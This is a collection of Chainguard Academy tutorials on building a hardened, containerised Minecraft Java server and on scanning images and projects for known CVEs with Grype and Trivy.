Minecraft Java server with default options, using cgr.dev/chainguard/jre:latest-dev as base image. 
This Dockerfile will: Install system dependencies as needed (curl, libudev) Add a regular system user named minecraft Set up the WORKDIR to /usr/share/minecrat Download the Minecraft Java server file Unpack the server.jar file Set up the eula.txt file using sed Configure the workdir permissions Change to the minecraft user Run the server Run the following command to create a Dockerfile containing all the steps previously described. cat > Dockerfile <<EOF FROM cgr.dev/chainguard/jre:latest-dev USER root RUN apk update && apk add curl libudev RUN adduser --system minecraft WORKDIR /usr/share/minecraft RUN curl -O https://piston-data.mojang.com/v1/objects/e6ec2f64e6080b9b5d9b471b291c33cc7f509733/server.jar RUN java -jar server.jar nogui RUN sed -i 's/false/true/' eula.txt RUN chown -R minecraft /usr/share/minecraft USER minecraft ENTRYPOINT ["java", "-jar", "/usr/share/minecraft/server.jar", "nogui"] EOF This command uses a heredoc input stream to create the described file without the need to use a text editor. We’ll also create a docker-compose.yaml file to facilitate running the container with additional settings, such as port forwarding. The following command will set up this file for you: cat > docker-compose.yaml <<EOF services: minecraft-java: image: cg-minecraft-server build: context: . restart: unless-stopped ports: - 25565:25565 EOF With both files set up, you are ready to run a test server. Start by building the image with: docker compose build [+] Building 0.1s (12/12) FINISHED docker:default => [minecraft-java internal] load build definition from Dockerfile 0.0s => => transferring dockerfile: 493B 0.0s => [minecraft-java internal] load metadata for cgr.dev/chainguard/jre:la 0.0s => [minecraft-java internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [minecraft-java 1/8] FROM cgr.dev/chainguard/jre:latest-dev 0.0s => CACHED [minecraft-java 2/8] RUN apk update && apk add curl libudev 0.0s => CACHED [minecraft-java 3/8] RUN adduser --system minecraft 0.0s => CACHED [minecraft-java 4/8] WORKDIR /usr/share/minecraft 0.0s => CACHED [minecraft-java 5/8] RUN curl -O https://piston-data.mojang.co 0.0s => CACHED [minecraft-java 6/8] RUN java -jar server.jar nogui 0.0s => CACHED [minecraft-java 7/8] RUN sed -i 's/false/true/' eula.txt 0.0s => CACHED [minecraft-java 8/8] RUN chown -R minecraft /usr/share/minecra 0.0s => [minecraft-java] exporting to image 0.0s => => exporting layers 0.0s => => writing image sha256:80ff613188679a08b6c440d56e84689dd7a7b2b30535c 0.0s => => naming to docker.io/library/cg-minecraft-server 0.0s You can now run the server with: docker compose up You’ll get output with details of the server setup, such as the server version (1.21.5), game mode (survival), and port (25565). By default, this will spin up a new Minecraft world in survival mode with difficulty set to “normal”, and a random world seed, which means the world’s spawn area (where players first start when joining a new game) will be set by random. 
[+] Running 2/2 ✔ Network minecraft-server_default Created 0.1s ✔ Container minecraft-server-minecraft-java-1 Created 0.1s Attaching to minecraft-java-1 minecraft-java-1 | Starting net.minecraft.server.Main minecraft-java-1 | [13:58:04] [ServerMain/INFO]: Environment: Environment[sessionHost=https://sessionserver.mojang.com, servicesHost=https://api.minecraftservices.com, name=PROD] minecraft-java-1 | [13:58:05] [ServerMain/INFO]: No existing world data, creating new world minecraft-java-1 | [13:58:05] [ServerMain/INFO]: Loaded 1370 recipes minecraft-java-1 | [13:58:05] [ServerMain/INFO]: Loaded 1481 advancements minecraft-java-1 | [13:58:05] [Server thread/INFO]: Starting minecraft server version 1.21.5 minecraft-java-1 | [13:58:05] [Server thread/INFO]: Loading properties minecraft-java-1 | [13:58:05] [Server thread/INFO]: Default game type: SURVIVAL minecraft-java-1 | [13:58:05] [Server thread/INFO]: Generating keypair minecraft-java-1 | [13:58:05] [Server thread/INFO]: Starting Minecraft server on *:25565 minecraft-java-1 | [13:58:06] [Server thread/INFO]: Using epoll channel type minecraft-java-1 | [13:58:06] [Server thread/INFO]: Preparing level "world" minecraft-java-1 | [13:58:08] [Server thread/INFO]: Preparing start region for dimension minecraft:overworld minecraft-java-1 | [13:58:08] [Worker-Main-11/INFO]: Preparing spawn area: 2% minecraft-java-1 | [13:58:08] [Worker-Main-5/INFO]: Preparing spawn area: 2% minecraft-java-1 | [13:58:09] [Worker-Main-15/INFO]: Preparing spawn area: 18% minecraft-java-1 | [13:58:09] [Worker-Main-6/INFO]: Preparing spawn area: 51% minecraft-java-1 | [13:58:10] [Worker-Main-15/INFO]: Preparing spawn area: 51% minecraft-java-1 | [13:58:10] [Server thread/INFO]: Time elapsed: 2189 ms minecraft-java-1 | [13:58:10] [Server thread/INFO]: Done (4.333s)! For help, type "help" Now, from a Java Minecraft client running on the same local network as your server, access the Multiplayer menu and add a new server using your server’s local IP address and port 25565. If you are running the client on the same machine as the server, you can use localhost or 127.0.0.1 as server address: Tip: On Linux systems, you can use the following command to obtain your local IP address: ip -o route get to 8.8.8.8 | sed -n 's/.*src \([0-9.]\+\).*/\1/p' Click Done and select the new server from the list to connect. Your Docker Compose logs should indicate that a user has joined the game: minecraft-java-1 | [18:20:29] [User Authenticator #1/INFO]: UUID of player boredcatmom is xxxx-xxxx-xxxx-xxxx-xxxx minecraft-java-1 | [18:20:30] [Server thread/INFO]: boredcatmom[/192.168.178.41:37810] logged in with entity id 27 at (-184.5, 69.0, 67.5) minecraft-java-1 | [18:20:30] [Server thread/INFO]: boredcatmom joined the game Go around and explore, but keep in mind that because this setup is isolated and there are no volumes set, all changes will be lost when the containers are removed, and a new docker compose up would give you an entirely new world with a random initial spawn area. When you’re ready to continue, hit CTRL+C to stop the server. In the next step, we’ll improve your setup to facilitate server customization. 2 – Configuring the Server You now have a server that runs with default options, but we need to be able to customize some settings. Minecraft servers use a configuration file called server.properties, located in the root of the server directory (where you unpacked the original .jar file). In our setup, this file lives in the /usr/share/minecraft folder. 
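For reference, server.properties is a plain key=value file. A few commonly adjusted entries look like the following; the values shown are illustrative vanilla defaults rather than settings taken from this guide:

gamemode=survival
difficulty=easy
level-name=world
level-seed=
motd=A Minecraft Server
max-players=20
server-port=25565

Any of these keys can be changed to tune the server, which is exactly what the configuration approaches discussed next are for.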
One way to customize the server is by replacing the default server.properties file with one of your own at build time. The downside of this method is that whenever you change a setting, you’ll need to rebuild the image. Another method is to use environment variables at runtime to replace values in the configuration file using sed. This is more complex as it requires an entrypoint bash script in order to work, but it allows you to make changes to your configuration without rebuilding the image. We have implemented this method in the GuardCraft demo, so we’ll reuse the same script here. This bash script will: Look for any environment variables that start with the MC_ prefix Parse the variable name in order to infer the configuration key in the server.properties file Obtain the value of the environment variable and use sed to replace original values with new values Finally, run the entrypoint command, which is passed to the script as its arguments (exec "$@") For your reference, this is the script we’ll download from the GuardCraft demo repository:
#!/usr/bin/env bash

SERVER_PATH=/usr/share/minecraft

# If MC_* ENV variables are set, update the server.properties file
mcEnvs=( "${!MC_@}" )
if [ "${#mcEnvs[@]}" -gt 0 ]; then
  for mcConfig in "${mcEnvs[@]}"; do
    IFS='_' read -ra CONFIG <<< "${mcConfig}"
    key=${CONFIG[1]}
    if [ "${#CONFIG[@]}" -gt 2 ]; then
      for ((i=2; i<${#CONFIG[@]}; i++)); do
        key="${key}-${CONFIG[i]}"
      done
    fi
    value=${!mcConfig}
    echo "Setting $key=$value"
    sed -i "s~^$key=.*~$key=${value}~" $SERVER_PATH/server.properties
  done
fi

exec "$@"
Now run the following command to download the script to your project folder: curl -O https://raw.githubusercontent.com/chainguard-dev/guardcraft-server/refs/heads/main/build-config.sh You’ll now edit your Dockerfile to copy the script to the image and replace the image’s entrypoint command. The script will run before the actual Java command that starts the server. Using a text editor of your choice, edit your Dockerfile so that it contains the following content:
FROM cgr.dev/chainguard/jre:latest-dev
USER root
RUN apk update && apk add curl libudev
RUN adduser --system minecraft
WORKDIR /usr/share/minecraft
COPY build-config.sh /usr/share/minecraft/
RUN chmod +x /usr/share/minecraft/build-config.sh
RUN curl -O https://piston-data.mojang.com/v1/objects/e6ec2f64e6080b9b5d9b471b291c33cc7f509733/server.jar
RUN java -jar server.jar nogui
RUN sed -i 's/false/true/' eula.txt
RUN chown -R minecraft /usr/share/minecraft
USER minecraft
ENTRYPOINT ["/usr/share/minecraft/build-config.sh", "java", "-jar", "/usr/share/minecraft/server.jar", "nogui"]
This adds a COPY statement to copy the bash script we just downloaded to the container’s WORKDIR, and changes the image’s entrypoint to use the script as a proxy to the Java command. This is a common Docker strategy for leveraging environment variables to configure containers at runtime. You’ll now edit your docker-compose.yaml file to include the environment variables that will customize your Minecraft server. You can refer to the official docs for all available options. In order to test the script, we’ll set some basic information and a level seed to choose the area in which players initially start the game.
Open your docker-compose.yaml file and edit its contents so that it looks like this, with an additional environment section where you’ll set up your MC_ variables:

services:
  minecraft-java:
    image: cg-minecraft-server
    build:
      context: .
    restart: unless-stopped
    ports:
      - 25565:25565
    environment:
      # Server properties Set Up
      # MC_* variables will be replaced in the server.properties file
      # Hyphens must be replaced with underscores
      MC_gamemode: "survival"
      MC_difficulty: "easy"
      MC_motd: "Welcome to GuardCraft!"
      MC_level_name: "GuardCraft"
      MC_level_seed: "69420018030897796"

Before rebuilding your image, run the following command to remove the containers created in the last run:

docker compose down

Next, run the following command to rebuild the image and start a new environment with Docker Compose:

docker compose up --build

After the image is built and the container starts running, you should get output from the entrypoint script indicating which variables were set:

...
minecraft-java-1  | Setting difficulty=easy
minecraft-java-1  | Setting gamemode=survival
minecraft-java-1  | Setting level-name=GuardCraft
minecraft-java-1  | Setting level-seed=69420018030897796
minecraft-java-1  | Setting motd=Welcome to GuardCraft!
...
minecraft-java-1  | [19:20:01] [Server thread/INFO]: Preparing level "GuardCraft"
...

If you join the server now, you should spawn close to a nice village.

3 – Setting Up Automatic Updates

Your server is now fully customizable through environment variables, but we’re still missing something important: updates. The Minecraft server download is statically defined in the Dockerfile, so it will go stale pretty quickly. We need a programmatic way to fetch the latest version of the server so that we don’t need to update the Dockerfile each time a new version of the server is out.

Mojang (the company that makes Minecraft) has a few API endpoints that can be used to fetch available versions and their respective download artifacts. In the GuardCraft demo, we have implemented a bash script that fetches the latest version of the server .jar file, verifies its SHA-1 checksum, and only then unpacks the file. We’ll implement the same script here. For your reference, this is the bash script we’ll download from the GuardCraft demo repository:

#!/usr/bin/env bash
# Script to download and install the Minecraft Java Server
# Usage: server-download.sh [version]
# If no version is provided, the latest version is used

if [ -n "$1" ] && [ "$1" != "latest" ]; then
    version=$1
else
    version=$(curl -s https://launchermeta.mojang.com/mc/game/version_manifest.json | jq -r '.versions | first | .id')
fi

echo "Selected version $version..."

version_url=$(curl -s https://launchermeta.mojang.com/mc/game/version_manifest.json | jq -r '.versions | map(select(.id == "'$version'")) | .[0] | .url')
if [ -z "$version_url" ]; then
    echo "Version $version not found"
    exit 1
fi

downloads=$(curl -s "$version_url" | jq -r '.downloads.server')
server_url=$(echo "$downloads" | jq -r '.url')
expected_sha1=$(echo "$downloads" | jq -r '.sha1')

# Download the server jar
curl -s -o server.jar "$server_url"

# Verify the SHA-1 checksum
downloaded_sha1=$(sha1sum server.jar | awk '{ print $1 }')
if [ "$downloaded_sha1" == "$expected_sha1" ]; then
    echo "SHA-1 checksum verification passed."
else
    echo "SHA-1 checksum verification failed."
    exit 1
fi

# Unpack the JAR and set up the eula.txt file
java -jar server.jar nogui
sed -i 's/false/true/' eula.txt

Run the following command to download the script:

curl -O https://raw.githubusercontent.com/chainguard-dev/guardcraft-server/refs/heads/main/server-install.sh

Next, update the Dockerfile to use this script. You’ll need to make four changes:

- add an ARG to define the version of the server, using "latest" as default value
- include jq in the list of apks to install
- copy the server-install.sh file to the container and make it executable
- replace the installation section with a call to the server-install.sh script, passing $VERSION as argument

Open the Dockerfile with an editor of your choice and replace its content with this updated version:

FROM cgr.dev/chainguard/jre:latest-dev

ARG VERSION="latest"

USER root
RUN apk update && apk add curl libudev jq
RUN adduser --system minecraft

WORKDIR /usr/share/minecraft

COPY build-config.sh server-install.sh /usr/share/minecraft/
RUN chmod +x /usr/share/minecraft/build-config.sh /usr/share/minecraft/server-install.sh

RUN /usr/share/minecraft/server-install.sh ${VERSION}
RUN chown -R minecraft /usr/share/minecraft

USER minecraft

ENTRYPOINT ["/usr/share/minecraft/build-config.sh", "java", "-jar", "/usr/share/minecraft/server.jar", "nogui"]

With the argument in place, you can now choose at build time which version of the server you want to install. This is useful if you want to stick to a specific version due to compatibility with your Minecraft client.

Now it’s time to test your upgraded setup. Stop any running containers and bring the environment down with the following command:

docker compose down

Then, execute the following to rebuild and run the environment:

docker compose up --build

You should be able to identify the server version in the output. At the time of this writing, the latest version is the stable release 1.21.5:

...
minecraft-java-1  | [11:56:29] [ServerMain/INFO]: No existing world data, creating new world
minecraft-java-1  | [11:56:30] [ServerMain/INFO]: Loaded 1373 recipes
minecraft-java-1  | [11:56:30] [ServerMain/INFO]: Loaded 1484 advancements
minecraft-java-1  | [11:56:30] [Server thread/INFO]: Starting minecraft server version 1.21.5
...

To join the server, a client must be running the same version (in this case, 1.21.5) of the game. If you run into issues, make sure you select “Latest Snapshot” in the Minecraft launcher before opening the game.

If you want to specify the version of the Minecraft server, you can pass the VERSION argument at build time. For instance, this will install version 1.21.4:

docker build --build-arg VERSION=1.21.4 . -t guardcraft-java

You now have a containerized setup that automatically downloads the latest version of the Minecraft Java server (or a version of your choice), fully customizable through environment variables. There’s one last thing to take care of now: persisting world data. We’ll see how to go about that in the next step.

4 – Persisting World Data

So far, we’ve run a Minecraft server with an ephemeral world: anytime you remove the containers and recreate the environment, a new world is created, so you’ll lose any progress you have made, such as builds and achievements. Minecraft servers have a special directory where the world data is stored. We’ll need to set up a volume for persisting that data. This way, even if you remove all containers and rebuild your image, your world will be reinstated when you run docker compose up again, and you won’t lose your progress.
If you haven’t yet, stop any running containers and bring your environment down:

docker compose down

Next, create a named volume to store your world data:

docker volume create guardcraft-world

This volume will be created in a location that you can obtain with the docker volume inspect command:

docker volume inspect guardcraft-world

[
    {
        "CreatedAt": "2025-02-14T12:20:08Z",
        "Driver": "local",
        "Labels": null,
        "Mountpoint": "/var/lib/docker/volumes/guardcraft-world/_data",
        "Name": "guardcraft-world",
        "Options": null,
        "Scope": "local"
    }
]

The Mountpoint indicates where your world data will be persisted on the host machine.

Next, open your docker-compose.yaml file using an editor of your choice and configure the minecraft-java service to use the named volume. You can replace the contents of the file with the following updated version:

services:
  minecraft-java:
    image: cg-minecraft-server
    build:
      context: .
    restart: unless-stopped
    ports:
      - 25565:25565
    environment:
      # Server properties Set Up
      # MC_* variables will be replaced in the server.properties file
      # Hyphens must be replaced with underscores
      MC_gamemode: "survival"
      MC_difficulty: "easy"
      MC_motd: "Welcome to GuardCraft!"
      MC_level_name: "GuardCraft"
      MC_level_seed: "-3930782522362688416"
    volumes:
      - guardcraft-world:/usr/share/minecraft

volumes:
  guardcraft-world:
    external: true

The external: true option tells Docker Compose that this volume is managed outside of the Compose lifecycle.

You can now run the following command to bring your environment up and put the changes into effect. You don’t need to rebuild the image, since there are no changes to the Dockerfile:

docker compose up

This will start a new environment that uses the guardcraft-world volume to persist world data. If you check the volume mount now, it will be populated with the new world data:

sudo ls /var/lib/docker/volumes/guardcraft-world/_data/GuardCraft

advancements  data  datapacks  DIM-1  DIM1  entities  level.dat  level.dat_old  playerdata  poi  region  session.lock  stats

You can now destroy and recreate your environment multiple times, but your world will be kept intact.

5 – Securing your Minecraft Server

You now have a flexible containerized setup for your Minecraft server, using a low-to-zero CVE image from Chainguard. To keep your server secure, there are a few additional strategies you should consider, even if you’re running the server in a local network. Let’s go through each of them.

Keep your image up-to-date

It is important to always keep your image up to date with the most recent versions of system dependencies and the Minecraft server software. Outdated images accumulate vulnerabilities over time, becoming a target for exploitation by malicious actors. The Image Update Considerations article on Chainguard Academy has more guidance on what you should take into account when deciding on an update strategy.

If you followed all steps in this guide so far, you should have set up an installation script that automatically downloads the latest version available for the server software. However, this happens at build time, which means you’ll need to rebuild the container in order to update. A good strategy is to set up a repository with your server setup and use a GitHub Action (or CI equivalent) to build and publish your image to a container registry. The GitHub documentation has more details on how to implement this action, and you can also check the GuardCraft repository for an example.

Pin to a digest and set up Digestabot

A digest is a unique identifier for a specific image build.
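For example, one way to see the digest of the base image used in this guide is with docker inspect. This is a quick sketch that assumes the image has already been pulled locally; the hash in the comment is illustrative only:

```bash
# Show the repository digest of the locally pulled base image.
docker inspect --format '{{index .RepoDigests 0}}' cgr.dev/chainguard/jre:latest-dev
# Example (illustrative) output:
# cgr.dev/chainguard/jre@sha256:4f0c9c...
```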
When you pin your Dockerfile to a digest instead of a mutable tag, you make your build reproducible, because anyone building your Dockerfile will be using the exact same version of the base image. This section of our Image Update Considerations article on Academy has details on recommended practices for pinning images to a specific version. You can also refer to this video for a demonstration on how to use image digests.

The downside of pinning your base image to a digest is that you’ll need to update your Dockerfile each time a new version of the image is available. You can automate most of this process with our Digestabot GitHub action, which will open a pull request with the updated digest each time a new image build becomes available.

Change the default port

Changing the default port is another recommended practice to mitigate exposure. To change the default port where your Minecraft server is running, you’ll need to set the server-port property in the server.properties file. If you followed all steps in this guide, you should be able to set this as an environment variable called MC_server_port in your docker-compose.yaml file. Don’t forget to update your port mapping settings to reflect this change. For example, the following will spin up a server with default settings running on port 25567:

services:
  java-server:
    image: guardcraft-java
    restart: unless-stopped
    ports:
      - 25567:25567
    environment:
      MC_server_port: 25567

Set up an access list

Minecraft servers have an access list feature that allows you to specify who can join your world. The Minecraft wiki has more details on how to set up this file within your server, but it’s essentially a JSON file containing the users who are allowed access to the server. This file should be included in the container image at build time. You must also change the white-list property on server.properties to true — in case you are using our Docker Compose setup, include an MC_white_list property set to true in your environment variables.

Use online mode

It is not mandatory for your server to connect to Mojang’s online services. However, keeping your server in online mode guarantees that only users with genuine Minecraft accounts can connect. You’ll also have the ability to identify users by their real usernames when they join the game. The online-mode property is set to true by default, so you don’t need to do anything — just keep it that way. Only change this to false for local network games, otherwise you’ll risk your server being raided by users with fake accounts. Servers in offline mode are referred to as “cracked servers” since they allow players with unlicensed copies of Minecraft to join.

Conclusion

In this tutorial, you learned how to set up a low-to-zero CVE Minecraft server using Chainguard’s Java runtime (JRE) container image. We started with a basic setup that we improved with bash scripts for installing and configuring the Java server. We also discussed some strategies for making your server more secure.

Our Staying Secure section on Chainguard Academy has more resources on container security and CVEs. For more details about Java and other Chainguard Containers, please refer to the Containers Directory.
---

### Using Grype to Scan Container Images for Vulnerabilities

URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/grype-tutorial/
Last Modified: June 6, 2024
Tags: CVE, Chainguard Containers

Grype is a vulnerability scanner for container images and filesystems developed and maintained by Anchore and written in the Go programming language. Grype can scan Docker, OCI, Singularity, and Podman images, as well as image archives and local directories. Grype is compatible with SBOMs generated by Syft, and Grype’s vulnerability database draws from a wide variety of sources, including Wolfi SecDB. Grype is appropriate both for one-off scans during manual CVE mitigation and for automated use in CI pipelines. Chainguard maintains a low-to-no CVE Chainguard Image for Grype based on our lightweight Wolfi distribution.

Installation

Container Images

Grype is readily available as a container image. To pull the low-to-no-CVE Chainguard Container for Grype and perform a scan on the official Docker nginx image, run the following:

docker run -it cgr.dev/chainguard/grype nginx

Alternatively, you can scan using the official Grype Docker image:

docker run -it anchore/grype:latest nginx

Binary Installation

Grype provides an installation script. To use it, change the path following the -b flag to a preferred installation location on your system path, such as /usr/local/bin:

curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin

Alternatively, find and download the appropriate package file or binary from the official releases page. Place the binary on your system path or install the package using the conventions for your OS and distribution. Note that Grype can also be built from source.

Install via Package Manager

Grype can be installed using the following commands specific to your OS and distribution:

Homebrew

brew tap anchore/grype
brew install grype

Chocolatey

choco install grype -y

Basic Usage

Throughout this tutorial, we’ll use the grype command to run Grype. If you’re running Grype as a container image, replace this command with the appropriate docker run command, such as docker run -it cgr.dev/chainguard/grype.

Scan an Image in a Registry

To run Grype on an image on Docker Hub, pass the image name as an argument:

grype nginx

For images on other registries:

grype cgr.dev/chainguard/nginx

Scan a .tar File

To scan an image stored as a .tar file, pass the path to the archive file as an argument:

docker pull cgr.dev/chainguard/nginx
docker save cgr.dev/chainguard/nginx > nginx_chainguard_image.tar
grype nginx_chainguard_image.tar

Scan a Local Directory

Grype can scan local directories, such as Python virtual environments (venv) or node_modules folders. To try it out, start by creating a Python virtual environment:

python -m venv venv

Add a few out-of-date packages that will show vulnerabilities:

./venv/bin/pip install WTForms==2.3.3 Werkzeug==2.0.1

Scan the virtual environment folder by passing the folder path to Grype as an argument:

grype venv

We can do the same with node modules in a node_modules folder. First, create an empty project folder and change the working directory to that folder:

mkdir node_project && cd node_project

Next, initialize npm with a default configuration:

npm init -y

Install a package with known vulnerabilities. The 6.5.2 version of the qs query string parser has a known vulnerability allowing for prototype poisoning.

npm install qs@6.5.2

Finally, use Grype to scan the current working directory:

grype .
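Because Grype can return a non-zero exit code when it finds vulnerabilities at or above a chosen severity (via its --fail-on flag), it is straightforward to gate a CI job on scan results. The snippet below is a minimal sketch of that pattern; the image name is only an example:

```bash
# Minimal CI-style gate: fail the job if any HIGH (or worse) CVE is found.
if grype cgr.dev/chainguard/nginx --fail-on high; then
  echo "Scan passed: no high or critical vulnerabilities found."
else
  echo "Scan failed: high or critical vulnerabilities detected." >&2
  exit 1
fi
```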
Scan from an SBOM Grype can read vulnerabilities from SBOMs generated by Syft. SBOMs can be piped into Grype using stdin: syft -o syft-json python > sbom.json cat sbom.json | grype You should see Grype results based on the packages itemized in the SBOM. Comprehending Grype Output By default, Grype output is divided into two sections: a summary of information on the scanned artifact and an itemized list of CVEs. In this section, we’ll use an Alpine version of the official Python image as an example. Since we’re specifying an older version, you may encounter more CVEs when following the examples than are shown here, as CVEs will accumulate on an image over time. Scan the image with the following command: grype python:3.10.14-alpine3.20 You will receive output similar to the following: ✔ Vulnerability DB [no update av ✔ Parsed image sha256:f48490 ✔ Cataloged contents 09feb83998b9d ├── ✔ Packages [47 pac │ └── ⠹ Linux kernel cataloger ├── ✔ File digests [659 fi ├── ✔ File metadata [659 lo └── ✔ Executables [144 ex ✔ Scanned for vulnerabilities [10 vulnerabi ├── by severity: 0 critical, 1 high, 8 medium └── by status: 7 fixed, 3 not-fixed, 0 igno NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY busybox 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium busybox 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium busybox-binsh 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium busybox-binsh 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium pip 23.0.1 23.3 python GHSA-mq26-g339-26xf Medium python 3.10.14 binary CVE-2023-36632 High python 3.10.14 binary CVE-2023-27043 Medium python 3.10.14 binary CVE-2024-4030 Unknown ssl_client 1.36.1-r28 1.36.1-r29 apk CVE-2023-42365 Medium ssl_client 1.36.1-r28 1.36.1-r29 apk CVE-2023-42364 Medium Interpreting the Summary In the initial portion of its results output, Grype summarizes information on the scanned artifact and gives an overview of known vulnerabilities. In the case of a scanned image, the output includes the image digest, a unique hash of the image that can be used as an identifier. Overview output includes the number of packages, files, and executables found in the artifact. Generally speaking, CVEs are detected against packages, but the number of executables detected can also give you an idea of the attack surface of the scanned image or filesystem. Finally, this portion gives a count of the number of CVEs detected by severity and fixed status. Severity categorization sorts CVEs into four categories based on the Common Vulnerability Scoring System (CVSS). What is CVSS?? CVEs are assigned numerical scores according to the Common Vulnerability Scoring System (CVSS), an open framework for communicating the severity of software vulnerabilities. CVSS scores correspond to four categories Critical (9.0-10.0) High (7.0-8.9) Medium (4.0-6.9) Low (0.1-3.9) In general, the higher the score, the more serious the vulnerability. Higher scores should be prioritized during CVE remediation. In our output, we can see that we have 0 critical, 1 high, and 8 medium CVEs: ├── by severity: 0 critical, 1 high, 8 medium, 0 low, 0 negligible Grype also counts the number of CVEs by fixed status. If a CVE is marked as fixed, it can be resolved by updating to a newer version of the package. Our output suggests that 7 packages have been fixed and can be remediated with updates: └── by status: 7 fixed, 3 not-fixed, 0 ignored Itemized CVEs In addition to the summary, Grype provides an itemized list of CVEs. 
By default, these are in table format, and list the package name, current version, severity, and package type (such as apt, apk, or binary). If the package is fixed, Grype will also indicate the package version where the fix was introduced. Grype writes itemized CVEs to stdout, so you can redirect the report of itemized CVEs to a file: grype python:3.10.14-alpine3.20 > report.txt Alternatively, you can use the --file flag to write to a file: grype --file report.txt python:3.10.14-alpine3.20 Redirecting output can also be useful to suppress a long list of CVEs, making the summary more immediately accessible. Output Formats Standard Formats You can use Grype to write itemized CVEs to a number of formats, including the XML- or JSON-based cyclonedx SBOM standard and the SARIF static analysis format. To maximize the information provided by Grype, use the JSON output type: grype -o json python:3.10.14-alpine3.20 > report.json When using these more detailed formats, Grype provides additional useful fields, such as the data source of the CVE, URLs to information on the CVE, advisories, related vulnerabilities, and details on how the vulnerability was detected. Output Templates Additional output formats are available as Hugo templates. These include output templates for HTML and CSV, and a full list can be found at the Grype GitHub repository. To generate a HTML file of the itemized CVEs, first clone the Grype repository from GitHub. Then provide the path to the template file in your grype command: git clone git@github.com:anchore/grype.git ~/.grype grype -o template -t ~/.grype/templates/html.tmpl python:3.10.14-alpine3.20 > report.html To generate a CSV: git clone git@github.com:anchore/grype.git ~/.grype grype -o template -t ~/.grype/templates/csv.tmpl python:3.10.14-alpine3.20 > report.csv grype explain Grype provides an explain subcommand that gives information on the nature of a specific CVE, how it was matched, and the locations of files associated with the vulnerability. The output of this command suggests a useful starting point for remediation. To use grype explain, generate JSON output from Grype and pipe it into the grype explain subcommand. Indicate the CVE you’d like information on using the --id flag. The -q flag in the following example suppresses the summary output. grype -q python:3.10.14-alpine3.20 -o json | grype explain --id CVE-2023-36632 Grype uses information from the JSON output to generate a human-readable report on the specific CVE that includes match information, file locations, and links to information on the vulnerability. Additional Resources The following resources may also be useful while working with Grype: Tools Syft - A Grype-compatible tool for generating SBOMs from images and filesystems. Grype-DB - A tool to build Grype databases from specific upstream vulnerability database providers Vunnel - A tool for collating vulnerability provider data Grype Chainguard Container — A low-to-no CVE container image maintained by Chainguard More on Grype Chainguard Deep Dive 🤿: Where Does Grype Data Come From? 
Grype on the Anchore blog - Blog posts from Anchore related to Grype
Why Chainguard uses Grype - Why Chainguard contributes to and recommends Grype for vulnerability scanning in container images

---

### OpenAPI Specification

URL: https://edu.chainguard.dev/chainguard/administration/api/
Last Modified: October 6, 2020

---

### Using Trivy to Scan Software Artifacts

URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/working-with-scanners/trivy-tutorial/
Last Modified: July 3, 2024
Tags: Conceptual, CVE

Trivy is a vulnerability scanner for a wide variety of software artifacts and deployments. Trivy is written in the Go programming language and is maintained by Aqua Security. Trivy targets container images, VMs, filesystems, remote GitHub repositories, and Kubernetes and Amazon Web Services deployments. The tool can be used to detect known vulnerabilities (CVEs), generate SBOMs, analyze licenses, and scan for misconfigurations and exposed secrets. Trivy can be installed from package managers or as a binary, and can also be run as a container image.

Installation

Package Managers

For Homebrew, use:

brew install trivy

Aqua Security maintains sources and packages for a variety of additional operating systems and distributions on their installation page.

Binary Installation

Aqua Security provides an installation script for Trivy. To install Trivy with the script, change the /usr/local/bin argument to the desired installation location on your path before running the following command:

curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin v0.52.2

On many system configurations, you may need to provide elevated permissions via sudo:

curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sudo sh -s -- -b /usr/local/bin v0.52.2

You can also manually install Trivy by downloading the binary for your operating system and architecture from the Trivy releases page and manually placing the binary on your path.

Container Image

Container images for Trivy are hosted on a variety of registries. When running Trivy as a container image, it is recommended to mount a cache directory as a volume. For scanning container images, it is also recommended to mount docker.sock. The following command will pull Trivy from Docker Hub, mount the two volumes, run the Trivy container, and use the running container to scan the official nginx image on Docker Hub:

docker run \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -v $HOME/Library/Caches:/root/.cache/ \
  aquasec/trivy:0.52.2 \
  image nginx

Basic Usage

Throughout this tutorial, we’ll use the trivy command to run Trivy. If you’re running Trivy as a container image, replace this command with the appropriate docker run command. To use Trivy, provide a subcommand indicating the type of artifact or deployment to be scanned along with the location of the target. For example, to scan the official Python image on Docker Hub:

trivy image python

Trivy will output a series of informational messages, a short summary of CVEs found, including severity, and an itemized list of CVEs.
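If that itemized list is long, one common refinement is to restrict the report to higher severities with Trivy’s --severity flag. A short sketch, using the same official Python image as an example:

```bash
# Limit the itemized report to HIGH and CRITICAL findings only.
trivy image --severity HIGH,CRITICAL python
```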
Valid Targets

Trivy can scan a wide variety of artifacts, collections, or deployments, collectively called targets. Each type of software artifact has a specific set of Trivy scanners enabled by default. For example, when scanning container images, Trivy will look for vulnerabilities and exposed secrets by default.

Scanning a Container Image

To scan a container image on Docker Hub, use the image subcommand and the name of the image as an argument:

trivy image nginx

For images on other registries:

trivy image cgr.dev/chainguard/nginx:latest

Scanning a Filesystem

Trivy can recursively scan directories on a local machine. To start a filesystem scan, run:

trivy fs <path>

where <path> indicates the root folder where the scan will begin. Trivy looks for specific files containing lists of packages, such as Python’s requirements.txt or poetry.lock, PHP’s composer.lock, or Node’s package-lock.json.

The following creates a Python project folder with a virtual environment, installs a set of older packages, generates a requirements.txt file itemizing all transitive dependencies, and scans the project folder using Trivy:

mkdir python-project && cd python-project
python -m venv venv
./venv/bin/pip install WTForms==2.3.3 Werkzeug==2.0.1
./venv/bin/pip freeze > requirements.txt
trivy fs .

The following creates a default Node project, installs an older package with npm, and scans the project with Trivy:

mkdir node_project && cd node_project
npm init -y
npm install qs@6.5.2
trivy fs .

You should see a summary and itemized list of CVEs for the outdated Node package.

Scanning Clusters

To scan a Kubernetes cluster:

trivy k8s --report summary <cluster-name>

